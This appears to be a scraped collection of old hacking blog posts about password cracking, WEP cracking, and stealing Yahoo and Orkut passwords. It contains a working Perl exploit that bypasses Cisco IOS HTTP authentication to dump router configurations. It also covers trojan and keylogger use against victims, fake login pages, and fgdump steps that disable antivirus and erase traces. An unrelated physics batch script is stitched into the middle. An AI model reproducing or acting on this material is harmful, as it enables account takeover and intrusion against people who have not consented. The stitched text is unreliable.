4.brute force: this is the last option, once the dictionary and hybrid attacks fails then you have to try this. it involves trying all the permutations and combinations with all ascii characters(there are 255 of them, including 0-9, a-z, A-Z, and some special characters) until the right password is found.
you will now be able to crack any of the above mentioned files... find the recovery softwares at:

http://www.elcomsoft.com/prs.html
http://www.fdrlab.com/
http://www.intelore.com/rar_password_recovery.php

***Live Cd For Wireless Hacking***

***Live Cd For Wireless Hacking***
This version is for all systems except systems with the Intel B/G wireless cards (IPW2200).

- Live CD with all the tools you need to hack a WLAN / wireless Access point -
Linux Live-CD - OS runs from CD - 635 mb - .iso
- also used by the FBI ...


WEP Hacking - The Next Generation

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of "strong" encryption while a 128 bit key has 104. The IV is placed in encrypted frame's header, and is transmitted in plain text.

Traditionally, crac*ing WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packetsâ€"a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP crac*ing program such as Aircrac* would be used to find the WEP key.

Fast-forward to last summer, when the first of the latest generation of WEP ing tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, "It doesn't matter if you use 128 bit WEP keys, you are vulnerable!"

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products.
WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long.

A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of "strong" encryption while a 128 bit key has 104.

The IV is placed in encrypted frame's header, and is transmitted in plain text.

Traditionally, ing WEP keys has been a slow and boring process.

An attacker would have to capture hundreds of thousands or millions of packets a process that could take hours or even days, depending on the volume of traffic passing over the wireless network.

After enough packets were captured, a WEP ing program such as Air would be used to find the WEP key.

Fast-forward to last summer, when the first of the latest generation of WEP ing tools appeared.

This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours.


Basic Directions:

1)Boot from cd
2)get the wep key
3)write it down
4)reboot into windows
5)connect using wep key.

Hear Is The Link :-
ftp.rz.tu-braunschweig.de/pub/mirror/auditor/auditor-250405-01.iso

Brute Force Engine

Brute Force Engine
Language:C++

Author:ASKOPPAL

Location:http://askoppal.googlepages.com/BFE.txt

Details:Finds every possible combination of ASCII characters, which are between 33 - 126. The characters between 33-126 are all of the possible chars allowed on our keyboard including special chars. This can program works perfect for cracking password.


ASKOPPAL
www.microhard.co.nr

Brute force IOS HTTP authorization vulnerability

Brute force IOS HTTP authorization vulnerability
#!/usr/bin/perl

#
# Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
#

use LWP;
use IO::Handle;

my $host = shift;

print "$host: ";
flush STDOUT;

my $agent = LWP::UserAgent->new;
my $request = HTTP::Request->new(GET => "http://$host/");
my $response = $agent->request($request);
my $level;

if ($response->is_success || $response->code != 401) {
if ($response->header('Server') ne '') {
print $response->header('Server');
print "\n";
}
else {
print "unexpected response, may not be a Cisco.\n";
}
exit;
}
for ($level = 16; $level <= 100; $level++) {
$request->uri("http://$host/level/$level/exec/show/config");
$response = $agent->request($request);
if ($response->is_success) {
open(HOST, ">$host") || die ("Can't open file $host\n");
print HOST $response->content;
close(HOST);
print "exploited.\n";
exit;
}
else {
if ($response->code != 401) {
print "unexpected response, may not be a Cisco.\n";
exit;
}
}
}

print "failed.\n";

____________
Credits:
r45c4l

The code is downloaded from here

http://www.phreedom.org/solar/code/ios-http-auth/ios-http-auth.pl

and credits goes to phreedom crew.

First have a look here:

http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml

----Excerpts---
By sending a crafted URL it is possible to bypass authentication and execute any command on the router at level 15 (enable level, the most privileged level). This will happen only if the user is using a local database for authentication (usernames and passwords are defined on the device itself). The same URL will not be effective against every Cisco IOS software release and hardware combination. However, there are only 84 different combinations to try, so it would be easy for an attacker to test them all in a short period of time.

The URL in question follows this format:

http:///level/xx/exec/....

Where xx is a number between 16 and 99.

This vulnerability is documented as Cisco Bug ID CSCdt93862.
-----------------

As you see this is one of the easiest exploit. The main part of the code is

--code--
for ($level = 16; $level <= 100; $level++) {
$request->uri("http://$host/level/$level/exec/show/config");
$response = $agent->request($request);
--------

what the program does is to replace variable $host with devicename and $level varies from 16 to 99 in the for loop, the program requests for the page /show/config and if the page is returned successfully the response is logged else returns for next level [ because if incorrect request is made the server will return errors like 200/401 etc.]

-----[Revision]----
my $host = shift;
Its POC so the original author left it but to make it functional you must replace 'shift' with an IP addr of the cisco device.

Web-Based Password Cracking

Web-Based Password Cracking This is for educational purpose only.

Password cracking doesn’t have to involve sophisticated tools; many times password guessing works well. It can be a tedious process, although human intuition can beat automated tools.

The basic types of password attacks include:

(1) Dictionary attacks – A text file full of dictionary words is loaded into a password program and then run against user accounts located by the application. If simple passwords have been used, this might be enough to crack the code.
(2) Hybid attacks – Similar to a dictionary attack, except that hybrid attacks add numbers or symbols to the dictionary words. Many people change their passwords by simply adding a number to the end of their current password. The pattern usually takes this form: First month’s password is Mike; second month’s password is Mike2; third month’s password is Mike3; and so on.
(3) Bruce force attacks – The most comprehensive form of attack and the most potentially time-consuming. Brute force attacks can take weeks, depending on the length and complexity of the password.

Some of these password cracking tools are:

(1) WebCracker – A simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement basic authentication password guessing.
(2) Brutus – Brutus can perform dictionary or brute force attacks against Telnet, FTP, SMTP, and web servers.
(3) ObiWan – Another web password cracking tool.

With logging enabled, you should be able to detect such tools. Following are a few entries from the Winnt/system32/Logfiles\W3SVC1 folder. They should look familiar:

192.168.13.3 sa HEAD /test/basic - 401 Mozilla/4.0+ (Compatible);Brutus/AET
192.168.13.3 administration HEAD /test/basic -
401 Moazilla/4.0+ (Compatible) ; Brutus/AET
192.168.13.3 admin HEAD /test/basic –
401 Moazilla/4.0+ (Compatible) ; Brutus/AET

Finding log information that leads directly to an attacker is not always so easy. Sometimes attackers will practice URL obfuscation. This allows the attacker to attempt to hide his IP address. Attackers will also attempt to use cookies to further their hold on a system.



Note: You can search in Google for Password cracking tools..........

ways of hacking

ways of hacking
Ways to crack orkut and yahoo etc.

- Bruteforce: You can initialize a Brute forcing operation to crack e-mail accounts. You can use any Bruteforcing tool or you can even code a simple bruteforcer in C. You can get wordlists from www.theargon.com

- Using a Keylogger: You can use a keylogger to log all the keystrokes that have been processed in a system. This is an effective way to acquire passwords. You should try out Aradamax Keylogger or S-C Keylogger.

- Social Engineering: You can use Social engineering techniques to acquire passwords. This method has been very effective.

- Vulnerability Assessment: You can assess the vulnerability status of your e-mail server. Search for web application vulnerabilities like SQL Injections, XSS, CSRF, RFI, LFI, Chunk Code Errorsetc.

- Phishing: You can create a fake login page that redirects the login information into your mailbox.

- Password Guessing: The least effective technique

i forgot to tell u that u can get ur frnd password by asking him too
he will tell you and you can hack his account
cool way na

Beginners steps for hacking.........
Beginners steps for hacking.........
Getting Ip's:--

To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.

Type netstat -r at the command prompt to see the ip of all computers you are connected to

In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.
When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are seperated by a : . Different programs use different ports, so you can work out which ip's are from which program.
Connecting to other computers and what ports are:--

Servers send information. Clients retrieve. Simple.
Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system
Ports are doors into computers. Hosts are computer names
(ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet.
Type http://www.yahoo.com/ as the host and port as 80 the click connect.
If nothing happens, you're in. Wow. You are connected to Y

if u lost ur password of folder then

access the SAM file in system32

The SAM tcl file would be:


module disable ConfigManager
talk DHInput
# Adjust the max files to ensure you dont time out!
maxFiles set 40
include dataset $env(SAM_DATASET)
cache set SAM
show include
exit

There is an command analogous to DCache cache set SAM indicating that we want SAM to manage access to this particular dataset. The disabling of the ConfigManager is needed to ensure the program does not crash after waiting for a tape and loosing its database connection. Since files will automatically be delivered to each process, and since it can take time for processes to get started, it is necessary to ensure that the maximum number of files any process gets can be processed within the time allowed for the batch queue. For example, if 15 files take 30 min (typical AC++Dump time), then 60 files is the maximum that the short queue (2 hours) can handle. You would want to make sure you set a maxFiles to 50 or 55 to be on the safe side. If you have 690 files in your dataset (as jbot0h does) then you need 13 processes and would want to submit ``from 1 to 13''. Since CAF puts 10 procesees in a section, you may want to submit 1 to 20.
The shell script (caf_sam.sh) one would use to run a SAM job would look like:

#!/bin/sh

# Normal cdfsoft setup
...
#SAM setup
setup sam -q prd
export CDF_USER_NAME=stdenis
# For Beta testing, please use this!
export SAM_INPUT_DEBUG=1
# Analysis execution command, clean up, etc
...

The only difference is that you have to setup sam explicitly.

You could also access the SAM file and save it up into Floppy using DOS and used lOpht Crack to decode the password.

Introduction
L0phtCrack is designed to recover passwords for Windows NT. NT does not store the actual passwords on an NT Domain Controller or Workstation. Instead it stores a cryptographic hash of the passwords. L0phtCrack can take the hashes of passwords and generate the cleartext passwords from them.

Installation
Unzip the distribution archive, lc2exe.zip into a directory. Create a shortcut to the executable l0phtcrack.exe (or l0phtcrack95.exe for Win95) and you are done unless you want to use the network sniffing feature.

To do network sniffing you need install an NDIS network driver. This driver will only work on ethernet network devices. Go to the Network settings in the Control Panel. Select the Protocols tab and press the Add.. button. Press Have Disk... and specify the directory where you installed L0phtCrack. This is where the Oemsetup.inf file is. You will need to restart before the new driver takes effect.



Accessing the Password Hashes
Before the passwords can be computed you need to retrieve the password hashes. There are 3 main methods to get the password hashes: from the registry directly, from a SAM file on disk, or by sniffing the network.
Dumping From the Registry
If you have administrator priviledges you can get the password hashes using the 'Tools Dump Passwords form Registry' command. Specify a computername or IP address in the format \\computername or \\ipaddress. NT can be configured to disallow access to the registry remotely over the network so you may need to be on the local machine if this is the case. Microsoft introduced the SYSKEY utility in NT SP3. If SYSKEY is running the password hashes are encrypted and cannot be retrieved in this manner.

If you are using a non-english language version of NT your version may use a different word for Administrators. If so you need to modify a registry key to get Dump Passwords to work. Run regedit.exe and edit the value of the key:

HKEY_CURRENT_USER\Software\LHI\L0phtCrack\AdminGroupName

Set it to your language version of 'Administrators'.



Extracting From a SAM File
The next method is new for L0phtCrack 2.0. You can retrieve the password hashes from the SAM file on the hard disk, from an NT Emergency Repair Disk, or from a backup tape. The NT registry is actually stored in several different files on the system disk in the d:\winnt\system32\config directory.

These files cannot be accessed while NT is running since they are opened exlusively by the operating system. If you have physical access you can boot the machine with a DOS floppy and use a program such as NTFSDOS (http://www.ntinternals.com/ntfs20r.zip) to copy the SAM file from d:\winnt\system32\config to a floppy disk. You can then use the L0phtCrack command 'File Import SAM' to extract the password hashes from the SAM file.

Another place to find the SAM file that doesn't require rebooting the machine is in the d:\winnt\repair directory or on an Emergency Repair floppy disk. Whenever a repair disk is made the contents of the SAM in the registry is saved and compressed into the file 'sam._'. This file can be uncompressed with the command:

expand sam._ sam
The expanded SAM file can be imported into L0phtCrack.

The SAM file is also backed up onto tape when a full backup is performed. If you have access to a backup tape you can restore the SAM file from d:\winnt\system32\config to another machine and import it into L0phtCrack.

If SYSKEY from NT 4.0 SP3 is installed all of the SAM files are encrypted and cannot be read by L0phtCrack.

Sniffing on the Network
If SYSKEY is installed and you have no network access to the registry or physical access don't fret. There is a 3rd method for obtaining the password hashes, network sniffing. Network sniffing requires that you are on a physical segment of the user or the resource they are accessing. The sniffer, readsmb.exe, included with L0phtCrack 2.0 will only work on Windows NT 4.0.

Follow the instructions in the Install section for installing the network driver necessary for using the network sniffer.

The network sniffer is a command line program named readsmb.exe. Run it and redirect its output to a file with the command:

readsmb > passwd

You probably want to let this run for a day or so to collect enough password hashes. You can then open this file into L0phtCrack using the command File Open.

Readsmb.exe also has a verbose mode that can be enabled by using the -v command: readsmb -v This output is not formatted properly for opening with L0phtCrack but it may be useful to you. On slow machines the -v option may cause readsmb to miss some packets so it is really just for debugging and exploring.



Computing Passwords
So now that you have the password hashes loaded into L0phtCrack you want to start computing. You start computing by using the command Tools Run. The default options are set to first run a dictionary computation using the default dictionary, words-english that comes with the L0phtCrack distribution and then run a Brute Force computation using the default character set, A-Z.

L0phtCrack will save the state of the computation every 5 minutes to a .LC file.
Readsmb.exe also has a verbose mode that can be enabled by using the -v command: readsmb -v This output is not formatted properly for opening with L0phtCrack but it may be useful to you. On slow machines the -v option may cause readsmb to miss some packets so it is really just for debugging and exploring.



Computing Passwords
So now that you have the password hashes loaded into L0phtCrack you want to start computing. You start computing by using the command Tools Run. The default options are set to first run a dictionary computation using the default dictionary, words-english that comes with the L0phtCrack distribution and then run a Brute Force computation using the default character set, A-Z.

L0phtCrack will save the state of the computation every 5 minutes to a .LC file.

The Tools Options menu command lets you select whether you want to do a dictionary attack and/or brute force attack
Password Crackers
NTFSDOS - (http://www.sysinternals.com)

pwdump2 - (http://www.webspan.net/~tas/pwdump2/)

John the Ripper - (http://www.openwall.com/john/)

L0phtCrack - (http://www.atstake.com/research/lc3/)

chntpw - (http://home.eunet.no/~pnordahl/ntpasswd/)

*** Password Recovery Tool***

*** Password Recovery Tool***
Cain And Abel (HOT Soft)

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.
The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.


Download links:- http://cain-abel.en.softonic.com/

mirror:-http://www.snapfiles.com/get/cainabel.html

methods of getting yahoo passwords

methods of getting yahoo passwords
Methods of getting yahoo passwords

I will explain in this tutorial how to obtain in difrent
ways yahoo passwords so that any N00B can understand and do
it.
It actualy isen't that hard the problem is thet with the
passing of years yahoo security has been getting better and
beter an most proggyes don't work anymore now I will
present to u the most efective reliable and easy to do
methods.After that I will also Informe you on how to
protect your self of thees dangers that go around te
internet.

METHOD 1
------BRUTE FORCING------
This is by far the most used method .You can find crackers
everywhere to download .On http://www.hackerspk.com/ there are a lot
of good cracked downloads.The one for which i sugest
R-G-Kracka it's easy to use and works. This is the most
sawed for method but is good for 2 things cracking boots
and when u realy want a password and will spend some time
cracking testing and working.
For this You have to get A cracker A password list and in
some cases a proxy list but I sugest u try a non proxy
cracker if it's ur first time.
This is a basic method and I'm sure that everyone will get
it the first time aldough results depend on your password
list.
PROTECTION It's simple get a very long password with asci
and numbers the most hard and long password that a brute
forcer will have trouble cracking and getting to is the
last of all asci letters and numbers the last password a
normal brute forcew of let's say 10 chars will be
"zzzzzzzz9!" thIs password will be the last one it will try
to crack.
method 2
------TROJAN PASSWORD STEALER------
This is one of the most effective methods of obtaining

passwords at this time.U get a programme named Y! Jacked/mps1.5se/sub7 n

one of it's many varyations from http://www.cyberpunkz.com/ or http://www.hackerspk.com/ there are

many trojans n stealers.
With this you have to take the main program put it in a

folder and generate a trojan that you send via atachment to

the victim's mail box.When that person opens it u will have

his password.This is a easy to use program just take care

taht most antivirusez see it as a virus and u shoulden't

get alarmed by that.It has a lot of options that u will

understand surely if u know english.
PROTECTION It's the easyest way to protect ur self don't

open atachments from anybody I can send a mail with an

atachment from any mail I want for example It's not smart

to open any atachment without a good antivirus.
METHOD 3
------THE FAKE LOGIN------
This is a modified login page for yahoo.It's code has been

altered .Instead of sending the password and the user to a

yahoo server for loging in it sends them to a yahoo server

that sends them in a mail account.
Get one of thees from cretain people lool.
It's hard to spot people u after u make a page with this u

have to send the link to some1 and he has to sign in from

there.
PROTECTION Don't sign in yahoo from pages like

"www.infernal.isking.com/login.yahoo/script"

This is probably a fake login.
Try to open one of thees pages and check out the source

code u can determine what it will do from there.

Method 4
------PASSWARE OR PASSWORD SENDER------
This is for u people that want all passwords that were

entered in Internet explorer on your computer.
U download Passweare recovery kit and it will give u all of

the passwords on ur computer u can use this for people u

are close to lol.
PROTECTION Be a paranoic son of a bitch scan ur computer

check instaled programs never let other people fuck with it

and of ource never enter your passwords in another person's

computer

Oky this was for all new one's Hope most of them get these

methods and will be able to use them
good luck

something about BRUTE FORCE attack

something about BRUTE FORCE attack
BRUTE-FORCE

1. Crack an FTP Password: NETWOX/NETWAG
The NETWOX application can be a very dangerous tool in wrong hands. The latest version has a 197 different techniques to enumerate information from the LOCAL AREA NETWORK(LAN) or launch attacks against a remote target. In this I just explain its ability to brute-force an FTP server given a username and password list.
SOURCE TO GET SOFTWARE:www.laurentconstantin.com/en/netw/netwox
PROCEDURE:Compile all components, run the NETWOX application, and review the results.


2. Extract Password Hashes: FGDump
The FGDump application was written to obtain the password hashes from the security Accounts manager(SAM) file on the target computer. This process includes:
1. Binding to a machine using the Inter-Process Communication(IPC$) or lists of targets.
2. Stopping the running of Anti-virus programs.
3. Locating writable file shares.
4. Uploading fgexec (for remote command execution) and cachedump.
5. Executing pwdump.
6. Executing cachedump.
7. Deleting uploaded files from the file share.
8. Unbinding from the file share.
9. Restarting any Anti-virus programs.
10. Unbinding from IPC$.
SOFTWARE TO GET SOFTWARE: [content suppressed]
PROCEDURE: Select the target and execute with the following syntax:
fgdump (-h host| -f filename) -u username -p password
As a example;
fgdump -vv -h IP address -u adminidtrator -p 123

1. here -vv shows very verbose mode.
2. -h IP address identifies the target.
3. -u adminsitrator identifies the usernaem to use.
4. -p 123 is the password for the administrator account.
According to the results of this example,it tells:
sharing of any drive
any mapped drive bounded with ADMIN$ and is writeable or not.
any antivirus running or not.
The Passwords were successfully dumped from the target and all the traces of the attack were removed from the target.
From the directory on the attacker's machine, two new files were created:
1. ip address cachedump
2. ip address pwdump
Of above two, the IP address.pwdump is the file of interest. By opening the ip address.pwdump file with a text editor such as Notepad the password hashes from the target are visible.
You can get more options by the following syntax:
fgdump -h/-?

3. Crack and Capture Password hashes: LC5
L0phtcrack version 5(LC5) is a password-auditing tool that allows for the capturing of windows passwords and or the conversion pf captured Windows password hashes into correct password. This is done by sending the captured hash through an alogrithm until the new hash exactly matches the original one. This identifies the password that computes into the hash.
LINK TO GET SOFTWARE: [content suppressed]
PROCEDURE:Install the L0phtcrack application,start, select parameters, and execute.
Simple to use and very good softwarer .you need a password dump file too which is created by fgdump ..........................herheheheheeheheeeee.....

4.Change the Administrator Password: CHNTPW
The change NT password(CHNTPW) application will change the administrator password regardless of what it is currently set to. CHNTPW also demonstrates the need for strong access controls and physical access to servers or any computer.
LINK TO GET SOFTWARE:home.eunet.no/~pnordahl/ntpasswd/
PROCEDURE: Gain physical access to the computer,boot from the CHNTPW CD, follow the on-screen instructions, change the password(s), and reboot.

5.BRUTE-FORCE Passwords for a hashed file: JOHN THE Ripper
JOHN THE RIPPER has been around seemingly forever. Its ability to brute-force passwords has a proven track record. It is flexible, fast, aand efficient, which are all quality items to look for when cracking passwords.
LINK TO GET SOFTWARE:www.openwall.com/john/
PROCEDURE:Configure, make and execute with approprite options against a file containing hashed paswords with the following syntax:
john (password file)

6.BRUTE-FORCE sn FTP Password Connection: BRUTEFTP
File Transfer Protocol is used to transfer files between computers and is still widely in use. The biggest flaw with FTP is that it is unencrypted in nature and f intercepted can be read easily, including the usernames, passwords, and data.
PROCEDURE: Install the application, select the target and execute.

7.BRUTE-FORCE terminal server passwords:TSGrinder II
TSGrinder II is an application designed to brute-force a usernames's password against a Terminal Server. Terminal Server uses an encrypted channel,which also helps evade Instrusion Detection Systems.ALthough a dicitionary-based tools, it supports multiple attack windows from the same dictionary file.
LINK TO GET SOFTWARE:www.hammerofgod.com/download.htm
PROCEDURE: Start the application with selected options under the following syntax:
tsgrinder -u (username) -w (dictionary file) target
as a example:
tsgrinder -u kermit -p dict IP address